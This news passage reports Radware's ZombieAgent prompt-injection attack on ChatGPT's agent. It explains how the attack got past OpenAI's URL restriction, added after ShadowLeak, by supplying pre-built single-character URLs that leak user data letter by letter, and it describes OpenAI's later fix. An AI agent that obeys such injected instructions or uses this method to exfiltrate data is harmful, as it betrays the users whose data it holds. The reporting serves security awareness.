To block the attack, OpenAI restricted ChatGPT to solely open URLs exactly as provided and refuse to add parameters to them, even when explicitly instructed to do otherwise. With that, ShadowLeak was blocked, since the LLM was unable to construct new URLs by concatenating words or names, appending query parameters, or inserting user-derived data into a base URL.
Radware’s ZombieAgent tweak was simple. The researchers revised the prompt injection to supply a complete list of pre-constructed URLs. Each one contained the base URL appended by a single number or letter of the alphabet, for example, example.com/a, example.com/b, and every subsequent letter of the alphabet, along with example.com/0 through example.com/9. The prompt also instructed the agent to substitute a special token for spaces.
Diagram illustrating the URL-based character exfiltration for bypassing the allow list introduced in ChatGPT in response to ShadowLeak.
Credit:
Radware
ZombieAgent worked because OpenAI developers didn’t restrict the appending of a single letter to a URL. That allowed the attack to exfiltrate data letter by letter.
OpenAI has mitigated the ZombieAgent attack by restricting ChatGPT from opening any link originating from an email unless it either appears in a well-known public index or was provided directly by the user in a chat prompt. The tweak is aimed at barring the agent from opening base URLs that lead to an attacker-controlled domain.
In fairness, OpenAI is hardly alone in this unending cycle of mitigating an attack only to see it revived through a simple change. If the past five years are any guide, this pattern is likely to endure indefinitely, in much the way SQL injection and memory corruption vulnerabilities continue to provide hackers with the fuel they need to compromise software and websites.
“Guardrails should not be considered fundamental solutions for the prompt injection problems,” Pascal Geenens, VP of threat intelligence at Radware, wrote in an email. “Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.”


